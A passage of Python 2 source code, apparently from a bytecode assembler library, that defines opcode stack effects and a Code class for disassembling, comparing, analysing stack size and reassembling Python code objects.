        INPLACE_POWER = INPLACE_MULTIPLY = INPLACE_DIVIDE = \
        INPLACE_FLOOR_DIVIDE = INPLACE_TRUE_DIVIDE = INPLACE_MODULO = \
        INPLACE_ADD = INPLACE_SUBTRACT = INPLACE_LSHIFT = INPLACE_RSHIFT = \
        INPLACE_AND = INPLACE_XOR = INPLACE_OR = \
        SLICE_1 = SLICE_2 = (2, 1)

    ROT_TWO = (2, 2)

    # --- pop 3 ---
    STORE_SLICE_1 = STORE_SLICE_2 = DELETE_SLICE_3 = STORE_SUBSCR = \
        EXEC_STMT = (3, 0)

    SLICE_3 = BUILD_CLASS = (3, 1)

    ROT_THREE = (3, 3)

    # --- pop 4 ---
    STORE_SLICE_3 = (4, 0)

    ROT_FOUR = (4, 4)

    # --- entries that differ between interpreter versions ---
    # Nothing is defined here for an unsupported version.
    if python_version in ('2.4', '2.5', '2.6', '2.7'):
        YIELD_VALUE = (1, 1)
        IMPORT_NAME = (2, 1)
        LIST_APPEND = (2, 0)
        if python_version == '2.4':
            YIELD_VALUE = (1, 0)
            IMPORT_NAME = (1, 1)
        if python_version == '2.7':
            LIST_APPEND = (1, 0)


# Replace the namespace class by a dict: Opcode -> (pop, push), holding only
# the opcodes that were listed in the class above.
_se = dict((op, _se.__dict__[opname[op]])
           for op in opcodes
           if opname[op] in _se.__dict__)

# Opcodes with neither a static effect nor an effect computable from their
# argument; they are the ones getse() refuses to handle.
hasflow = opcodes.difference(_se).difference([
    CALL_FUNCTION, CALL_FUNCTION_VAR, CALL_FUNCTION_KW,
    CALL_FUNCTION_VAR_KW, BUILD_TUPLE, BUILD_LIST,
    UNPACK_SEQUENCE, BUILD_SLICE, DUP_TOPX,
    RAISE_VARARGS, MAKE_FUNCTION, MAKE_CLOSURE])
if python_version == '2.7':
    hasflow = hasflow.difference([BUILD_SET])


def getse(op, arg=None):
    """Return the stack effect of an opcode as a (pop, push) tuple.

    Opcodes with a fixed effect are answered from the static table and
    ignore arg.  For the others the effect is derived from arg.

    Raises ValueError when arg is required but missing, when a call
    opcode's arg does not fit in two bytes, for MAKE_CLOSURE on Python 2.4,
    and for any opcode that is unknown or has special flow control.
    """
    if op in _se:
        return _se[op]

    # Everything below has an effect that depends on arg
    if arg is None:
        raise ValueError("Opcode stack behaviour depends on arg")

    # Number of extra objects (*args and/or **kwargs) each call opcode pops.
    call_extras = {
        CALL_FUNCTION: 0,
        CALL_FUNCTION_VAR: 1,
        CALL_FUNCTION_KW: 1,
        CALL_FUNCTION_VAR_KW: 2,
    }
    if op in call_extras:
        if arg > 0xFFFF:
            raise ValueError("Can only split a two-byte argument")
        low_byte = arg & 0xFF
        high_byte = (arg >> 8) & 0xFF
        # One for the callable, one per low-byte count, two per high-byte
        # count, plus the extras; exactly one result is pushed.
        return (call_extras[op] + 1 + low_byte + 2*high_byte, 1)

    if op in (BUILD_TUPLE, BUILD_LIST, BUILD_SLICE):
        return arg, 1
    # BUILD_SET only exists as a name on 2.7, hence the version test first.
    if python_version == '2.7' and op == BUILD_SET:
        return arg, 1
    if op == UNPACK_SEQUENCE:
        return 1, arg
    if op == DUP_TOPX:
        return arg, arg*2
    if op in (RAISE_VARARGS, MAKE_FUNCTION):
        return 1+arg, 1
    if op == MAKE_CLOSURE:
        if python_version == '2.4':
            raise ValueError("The stack effect of MAKE_CLOSURE depends on TOS")
        return 2+arg, 1

    raise ValueError("The opcode %r isn't recognized or has a special "
                     "flow control" % op)


class SetLinenoType(object):
    """Type of the SetLineno marker; its repr is 'SetLineno'."""

    def __repr__(self):
        return 'SetLineno'


# The single marker object used in the opcode slot of line-number entries.
SetLineno = SetLinenoType()


class Label(object):
    """A position marker in a code list; jump arguments refer to Labels."""


def isopcode(obj):
    """Return whether obj is an opcode - not SetLineno or Label"""
    return not (obj is SetLineno or isinstance(obj, Label))


# Flags from code.h
CO_OPTIMIZED = 0x0001      # use LOAD/STORE_FAST instead of _NAME
CO_NEWLOCALS = 0x0002      # only cleared for module/exec code
CO_VARARGS = 0x0004
CO_VARKEYWORDS = 0x0008
CO_NESTED                 = 0x0010   # ???
CO_GENERATOR              = 0x0020
CO_NOFREE                 = 0x0040   # set if no free or cell vars
CO_GENERATOR_ALLOWED      = 0x1000   # unused
# The future flags are only used on code generation, so we can ignore them.
# (It does cause some warnings, though.)
CO_FUTURE_DIVISION        = 0x2000
CO_FUTURE_ABSOLUTE_IMPORT = 0x4000
CO_FUTURE_WITH_STATEMENT  = 0x8000


######################################################################
# Define the Code class

class Code(object):
    """An object which holds all the information which a Python code object
    holds, but in an easy-to-play-with representation.

    The attributes are:

    Affecting action
    ----------------
    code - list of 2-tuples: the code
    freevars - list of strings: the free vars of the code (those are names
               of variables created in outer functions and used in the function)
    args - list of strings: the arguments of the code
    varargs - boolean: Does args end with a '*args' argument
    varkwargs - boolean: Does args end with a '**kwargs' argument
    newlocals - boolean: Should a new local namespace be created.
                (True in functions, False for module and exec code)

    Not affecting action
    --------------------
    name - string: the name of the code (co_name)
    filename - string: the file name of the code (co_filename)
    firstlineno - int: the first line number (co_firstlineno)
    docstring - string or None: the docstring (the first item of co_consts,
                if it's str or unicode)

    code is a list of 2-tuples. The first item is an opcode, or SetLineno, or a
    Label instance. The second item is the argument, if applicable, or None.
    code can be a CodeList instance, which will produce nicer output when
    being printed.

    Two Code objects compare equal (==) when all the attributes above are
    equal and their code lists match instruction by instruction, with Labels
    matched structurally rather than by identity. != is the exact negation.
    """
    def __init__(self, code, freevars, args, varargs, varkwargs, newlocals,
                 name, filename, firstlineno, docstring):
        """Store the given values as attributes of the same names."""
        self.code = code
        self.freevars = freevars
        self.args = args
        self.varargs = varargs
        self.varkwargs = varkwargs
        self.newlocals = newlocals
        self.name = name
        self.filename = filename
        self.firstlineno = firstlineno
        self.docstring = docstring

    @staticmethod
    def _findlinestarts(code):
        """Find the offsets in a byte code which are start of lines in the
        source.

        Generate pairs (offset, lineno) as described in Python/compile.c.

        This is a modified version of dis.findlinestarts, which allows multiple
        "line starts" with the same line number.
        """
        # co_lnotab alternates (byte increment, line increment) bytes.
        byte_increments = [ord(c) for c in code.co_lnotab[0::2]]
        line_increments = [ord(c) for c in code.co_lnotab[1::2]]

        lineno = code.co_firstlineno
        addr = 0
        for byte_incr, line_incr in zip(byte_increments, line_increments):
            if byte_incr:
                yield (addr, lineno)
                addr += byte_incr
            lineno += line_incr
        yield (addr, lineno)

    @classmethod
    def from_code(cls, co):
        """Disassemble a Python code object into a Code object.

        Code objects loaded by LOAD_CONST right before an opcode in hascode
        (MAKE_FUNCTION / MAKE_CLOSURE) are disassembled recursively.

        Raises ValueError if an opcode in hascode is not directly preceded
        by a LOAD_CONST entry.
        """
        co_code = co.co_code
        labels = dict((addr, Label()) for addr in findlabels(co_code))
        linestarts = dict(cls._findlinestarts(co))
        cellfree = co.co_cellvars + co.co_freevars

        code = CodeList()
        n = len(co_code)
        i = 0
        extended_arg = 0
        while i < n:
            op = Opcode(ord(co_code[i]))
            if i in labels:
                code.append((labels[i], None))
            if i in linestarts:
                code.append((SetLineno, linestarts[i]))
            i += 1
            if op in hascode:
                lastop, lastarg = code[-1]
                if lastop != LOAD_CONST:
                    raise ValueError(
                        "%s should be preceded by LOAD_CONST code" % op)
                code[-1] = (LOAD_CONST, Code.from_code(lastarg))
            # hasarg is derived from opmap, which leaves EXTENDED_ARG out, so
            # the prefix has to be tested for explicitly. Otherwise it would
            # be emitted as an argument-less opcode and its two operand bytes
            # would be decoded as instructions.
            if op not in hasarg and op != opcode.EXTENDED_ARG:
                code.append((op, None))
            else:
                arg = ord(co_code[i]) + ord(co_code[i+1])*256 + extended_arg
                extended_arg = 0
                i += 2
                if op == opcode.EXTENDED_ARG:
                    # Not emitted: it only supplies the high 16 bits of the
                    # next opcode's argument.
                    extended_arg = arg << 16
                elif op in hasconst:
                    code.append((op, co.co_consts[arg]))
                elif op in hasname:
                    code.append((op, co.co_names[arg]))
                elif op in hasjabs:
                    code.append((op, labels[arg]))
                elif op in hasjrel:
                    # Relative to the offset following the instruction.
                    code.append((op, labels[i + arg]))
                elif op in haslocal:
                    code.append((op, co.co_varnames[arg]))
                elif op in hascompare:
                    code.append((op, cmp_op[arg]))
                elif op in hasfree:
                    code.append((op, cellfree[arg]))
                else:
                    code.append((op, arg))

        varargs = bool(co.co_flags & CO_VARARGS)
        varkwargs = bool(co.co_flags & CO_VARKEYWORDS)
        newlocals = bool(co.co_flags & CO_NEWLOCALS)
        # The *args / **kwargs names directly follow the positional ones.
        args = co.co_varnames[:co.co_argcount + varargs + varkwargs]
        if co.co_consts and isinstance(co.co_consts[0], basestring):
            docstring = co.co_consts[0]
        else:
            docstring = None
        return cls(code = code,
                   freevars = co.co_freevars,
                   args = args,
                   varargs = varargs,
                   varkwargs = varkwargs,
                   newlocals = newlocals,
                   name = co.co_name,
                   filename = co.co_filename,
                   firstlineno = co.co_firstlineno,
                   docstring = docstring,
                   )

    def __eq__(self, other):
        """Return whether other is a Code object equivalent to this one.

        Returns NotImplemented when other is not a Code instance, so that
        comparing with an unrelated object yields "not equal" instead of
        raising AttributeError.
        """
        if not isinstance(other, Code):
            return NotImplemented

        if (self.freevars != other.freevars or
            self.args != other.args or
            self.varargs != other.varargs or
            self.varkwargs != other.varkwargs or
            self.newlocals != other.newlocals or
            self.name != other.name or
            self.filename != other.filename or
            self.firstlineno != other.firstlineno or
            self.docstring != other.docstring or
            len(self.code) != len(other.code)
            ):
            return False

        # Compare code. This isn't trivial because labels should be matching,
        # not equal.
        labelmapping = {}
        for (op1, arg1), (op2, arg2) in itertools.izip(self.code, other.code):
            if isinstance(op1, Label):
                if labelmapping.setdefault(op1, op2) is not op2:
                    return False
            else:
                if op1 != op2:
                    return False
                if op1 in hasjump:
                    if labelmapping.setdefault(arg1, arg2) is not arg2:
                        return False
                elif op1 in hasarg:
                    # arg1 may itself be a nested Code object; this relies on
                    # __ne__ below being the negation of __eq__.
                    if arg1 != arg2:
                        return False
        return True

    def __ne__(self, other):
        """Return the negation of __eq__.

        Python 2 does not derive != from __eq__. Without this method != on
        Code objects would compare by identity, and the argument comparison
        inside __eq__ would treat equal nested Code constants as different.
        """
        result = self.__eq__(other)
        if result is NotImplemented:
            return result
        return not result

    def _compute_flags(self):
        """Compute the co_flags value from the attributes and the opcodes used."""
        opcodes = set(op for op, arg in self.code if isopcode(op))

        optimized = (STORE_NAME not in opcodes and
                     LOAD_NAME not in opcodes and
                     DELETE_NAME not in opcodes)
        generator = (YIELD_VALUE in opcodes)
        nofree = not (opcodes.intersection(hasfree))

        flags = 0
        if optimized: flags |= CO_OPTIMIZED
        if self.newlocals: flags |= CO_NEWLOCALS
        if self.varargs: flags |= CO_VARARGS
        if self.varkwargs: flags |= CO_VARKEYWORDS
        if generator: flags |= CO_GENERATOR
        if nofree: flags |= CO_NOFREE
        return flags

    def _compute_stacksize(self):
        """Get a code list, compute its maximal stack usage.

        Raises ValueError if two paths reach the same label with different
        stack states, or if an opcode pops more than the current block holds.
        """
        # This is done by scanning the code, and computing for each opcode
        # the stack state at the opcode.
        code = self.code

        # A mapping from labels to their positions in the code list
        label_pos = dict((op, pos)
                         for pos, (op, arg) in enumerate(code)
                         if isinstance(op, Label))

        # sf_targets are the targets of SETUP_FINALLY opcodes. They are recorded
        # because they have special stack behaviour. If an exception was raised
        # in the block pushed by a SETUP_FINALLY opcode, the block is popped
        # and 3 objects are pushed. On return or continue, the block is popped
        # and 2 objects are pushed. If nothing happened, the block is popped by
        # a POP_BLOCK opcode and 1 object is pushed by a (LOAD_CONST, None)
        # operation.
        #
        # Our solution is to record the stack state of SETUP_FINALLY targets
        # as having 3 objects pushed, which is the maximum. However, to make
        # stack recording consistent, the get_next_stacks function will always
        # yield the stack state of the target as if 1 object was pushed, but
        # this will be corrected in the actual stack recording.

        sf_targets = set(label_pos[arg]
                         for op, arg in code
                         if op == SETUP_FINALLY)

        # What we compute - for each opcode, its stack state, as an n-tuple.
        # n is the number of blocks pushed. For each block, we record the number
        # of objects pushed.
        stacks = [None] * len(code)

        def get_next_stacks(pos, curstack):
            """Get a code position and the stack state before the operation
            was done, and yield pairs (pos, curstack) for the next positions
            to be explored - those are the positions to which you can get
            from the given (pos, curstack).

            If the given position was already explored, nothing will be yielded.
            """
            op, arg = code[pos]

            if isinstance(op, Label):
                # We should check if we already reached a node only if it is
                # a label.
                if pos in sf_targets:
                    curstack = curstack[:-1] + (curstack[-1] + 2,)
                if stacks[pos] is None:
                    stacks[pos] = curstack
                else:
                    if stacks[pos] != curstack:
                        raise ValueError("Inconsistent code")
                    return

            def newstack(n):
                # Return a new stack, modified by adding n elements to the last
                # block
                if curstack[-1] + n < 0:
                    raise ValueError("Popped a non-existing element")
                return curstack[:-1] + (curstack[-1]+n,)

            if not isopcode(op):
                # label or SetLineno - just continue to next line
                yield pos+1, curstack

            elif op in (STOP_CODE, RETURN_VALUE, RAISE_VARARGS):
                # No place in particular to continue to
                pass

            elif op == MAKE_CLOSURE and python_version == '2.4':
                # This is only relevant in Python 2.4 - in Python 2.5 the stack
                # effect of MAKE_CLOSURE can be calculated from the arg.
                # In Python 2.4, it depends on the number of freevars of TOS,
                # which should be a code object.
                if pos == 0:
                    raise ValueError(
                        "MAKE_CLOSURE can't be the first opcode")
                lastop, lastarg = code[pos-1]
                if lastop != LOAD_CONST:
                    raise ValueError(
                        "MAKE_CLOSURE should come after a LOAD_CONST op")
                try:
                    nextrapops = len(lastarg.freevars)
                except AttributeError:
                    try:
                        nextrapops = len(lastarg.co_freevars)
                    except AttributeError:
                        raise ValueError(
                            "MAKE_CLOSURE preceding const should "
                            "be a code or a Code object")

                yield pos+1, newstack(-arg-nextrapops)

            elif op not in hasflow:
                # Simple change of stack
                pop, push = getse(op, arg)
                yield pos+1, newstack(push - pop)

            elif op in (JUMP_FORWARD, JUMP_ABSOLUTE):
                # One possibility for a jump
                yield label_pos[arg], curstack

            elif python_version < '2.7' and op in (JUMP_IF_FALSE, JUMP_IF_TRUE):
                # Two possibilities for a jump
                yield label_pos[arg], curstack
                yield pos+1, curstack

            elif python_version >= '2.7' and op in (POP_JUMP_IF_FALSE, POP_JUMP_IF_TRUE):
                # Two possibilities for a jump
                yield label_pos[arg], newstack(-1)
                yield pos+1, newstack(-1)

            elif python_version >= '2.7' and op in (JUMP_IF_TRUE_OR_POP, JUMP_IF_FALSE_OR_POP):
                # Two possibilities for a jump
                yield label_pos[arg], curstack
                yield pos+1, newstack(-1)

            elif op == FOR_ITER:
                # FOR_ITER pushes next(TOS) on success, and pops TOS and jumps
                # on failure
                yield label_pos[arg], newstack(-1)
                yield pos+1, newstack(1)

            elif op == BREAK_LOOP:
                # BREAK_LOOP jumps to a place specified on block creation, so
                # it is ignored here
                pass

            elif op == CONTINUE_LOOP:
                # CONTINUE_LOOP jumps to the beginning of a loop which should
                # already have been discovered, but we verify anyway.
                # It pops a block.
                if python_version == '2.6':
                    pos, stack = label_pos[arg], curstack[:-1]
                    if stacks[pos] != stack: #this could be a loop with a 'with' inside
                        yield pos, stack[:-1] + (stack[-1]-1,)
                    else:
                        yield pos, stack
                else:
                    yield label_pos[arg], curstack[:-1]

            elif op == SETUP_LOOP:
                # We continue with a new block.
                # On break, we jump to the label and return to current stack
                # state.
                yield label_pos[arg], curstack
                yield pos+1, curstack + (0,)

            elif op == SETUP_EXCEPT:
                # We continue with a new block.
                # On exception, we jump to the label with 3 extra objects on
                # stack
                yield label_pos[arg], newstack(3)
                yield pos+1, curstack + (0,)

            elif op == SETUP_FINALLY:
                # We continue with a new block.
                # On exception, we jump to the label with 3 extra objects on
                # stack, but to keep stack recording consistent, we behave as
                # if we add only 1 object. Extra 2 will be added to the actual
                # recording.
                yield label_pos[arg], newstack(1)
                yield pos+1, curstack + (0,)

            elif python_version == '2.7' and op == SETUP_WITH:
                yield label_pos[arg], curstack
                yield pos+1, newstack(-1) + (1,)

            elif op == POP_BLOCK:
                # Just pop the block
                yield pos+1, curstack[:-1]

            elif op == END_FINALLY:
                # Since stack recording of SETUP_FINALLY targets is of 3 pushed
                # objects (as when an exception is raised), we pop 3 objects.
                yield pos+1, newstack(-3)

            elif op == WITH_CLEANUP:
                # Since WITH_CLEANUP is always found after SETUP_FINALLY
                # targets, and the stack recording is that of a raised
                # exception, we can simply pop 1 object and let END_FINALLY
                # pop the remaining 3.
                if python_version == '2.7':
                    yield pos+1, newstack(2)
                else:
                    yield pos+1, newstack(-1)

            else:
                assert False, "Unhandled opcode: %r" % op


        # Now comes the calculation: open_positions holds positions which are
        # yet to be explored. In each step we take one open position, and
        # explore it by adding the positions to which you can get from it, to
        # open_positions. On the way, we update maxsize.
        # open_positions is a list of tuples: (pos, stack state)
        maxsize = 0
        open_positions = [(0, (0,))]
        while open_positions:
            pos, curstack = open_positions.pop()
            maxsize = max(maxsize, sum(curstack))
            open_positions.extend(get_next_stacks(pos, curstack))

        return maxsize

    def to_code(self):
        """Assemble a Python code object from a Code object.

        Raises ValueError if the code list contains an explicit EXTENDED_ARG
        entry (the prefix is generated automatically for large arguments),
        and NotImplementedError if a jump offset does not fit in 16 bits.
        """
        co_argcount = len(self.args) - self.varargs - self.varkwargs
        co_stacksize = self._compute_stacksize()
        co_flags = self._compute_flags()

        # The docstring always occupies the first constant slot.
        co_consts = [self.docstring]
        co_names = []
        co_varnames = list(self.args)

        co_freevars = tuple(self.freevars)

        # We find all cellvars beforehand, for two reasons:
        # 1. We need the number of them to construct the numeric argument
        #    for ops in "hasfree".
        # 2. We need to put arguments which are cell vars in the beginning
        #    of co_cellvars
        cellvars = set(arg for op, arg in self.code
                       if isopcode(op) and op in hasfree
                       and arg not in co_freevars)
        co_cellvars = [x for x in self.args if x in cellvars]

        def index(seq, item, eq=operator.eq, can_append=True):
            """Find the index of item in a sequence and return it.
            If it is not found in the sequence, and can_append is True,
            it is appended to the sequence.

            eq is the equality operator to use.
            """
            for i, x in enumerate(seq):
                if eq(x, item):
                    return i
            else:
                if can_append:
                    seq.append(item)
                    return len(seq) - 1
                else:
                    raise IndexError("Item not found")

        # List of tuples (pos, label) to be filled later
        jumps = []
        # A mapping from a label to its position
        label_pos = {}
        # Last SetLineno
        lastlineno = self.firstlineno
        lastlinepos = 0

        co_code = array('B')
        co_lnotab = array('B')
        for i, (op, arg) in enumerate(self.code):
            if isinstance(op, Label):
                label_pos[op] = len(co_code)

            elif op is SetLineno:
                incr_lineno = arg - lastlineno
                incr_pos = len(co_code) - lastlinepos
                lastlineno = arg
                lastlinepos = len(co_code)

                if incr_lineno == 0 and incr_pos == 0:
                    co_lnotab.append(0)
                    co_lnotab.append(0)
                else:
                    # Each lnotab entry is a pair of unsigned bytes, so
                    # larger increments are split over several entries.
                    while incr_pos > 255:
                        co_lnotab.append(255)
                        co_lnotab.append(0)
                        incr_pos -= 255
                    while incr_lineno > 255:
                        co_lnotab.append(incr_pos)
                        co_lnotab.append(255)
                        incr_pos = 0
                        incr_lineno -= 255
                    if incr_pos or incr_lineno:
                        co_lnotab.append(incr_pos)
                        co_lnotab.append(incr_lineno)

            elif op == opcode.EXTENDED_ARG:
                raise ValueError("EXTENDED_ARG not supported in Code objects")

            elif not op in hasarg:
                co_code.append(op)

            else:
                if op in hasconst:
                    # A Code constant feeding MAKE_FUNCTION / MAKE_CLOSURE is
                    # assembled recursively.
                    if isinstance(arg, Code) and i < len(self.code)-1 and \
                       self.code[i+1][0] in hascode:
                        arg = arg.to_code()
                    # Constants are shared by identity, not by equality.
                    arg = index(co_consts, arg, operator.is_)
                elif op in hasname:
                    arg = index(co_names, arg)
                elif op in hasjump:
                    # arg will be filled later
                    jumps.append((len(co_code), arg))
                    arg = 0
                elif op in haslocal:
                    arg = index(co_varnames, arg)
                elif op in hascompare:
                    arg = index(cmp_op, arg, can_append=False)
                elif op in hasfree:
                    # Free variables are numbered after all cell variables.
                    try:
                        arg = index(co_freevars, arg, can_append=False) \
                              + len(cellvars)
                    except IndexError:
                        arg = index(co_cellvars, arg)
                else:
                    # arg is ok
                    pass

                if arg > 0xFFFF:
                    # Emit the high 16 bits in an EXTENDED_ARG prefix.
                    co_code.append(opcode.EXTENDED_ARG)
                    co_code.append((arg >> 16) & 0xFF)
                    co_code.append((arg >> 24) & 0xFF)
                co_code.append(op)
                co_code.append(arg & 0xFF)
                co_code.append((arg >> 8) & 0xFF)

        # Second pass: all label positions are known, patch the jump operands.
        for pos, label in jumps:
            jump = label_pos[label]
            if co_code[pos] in hasjrel:
                # Relative to the end of the 3-byte jump instruction.
                jump -= pos+3
            if jump > 0xFFFF:
                raise NotImplementedError("Extended jumps not implemented")
            co_code[pos+1] = jump & 0xFF
            co_code[pos+2] = (jump >> 8) & 0xFF

        co_code = co_code.tostring()
        co_lnotab = co_lnotab.tostring()

        co_consts = tuple(co_consts)
        co_names = tuple(co_names)
        co_varnames = tuple(co_varnames)
        co_nlocals = len(co_varnames)
        co_cellvars = tuple(co_cellvars)

        return types.CodeType(co_argcount, co_nlocals, co_stacksize, co_flags,
                              co_code, co_consts, co_names, co_varnames,
                              self.filename, self.name, self.firstlineno, co_lnotab,
                              co_freevars, co_cellvars)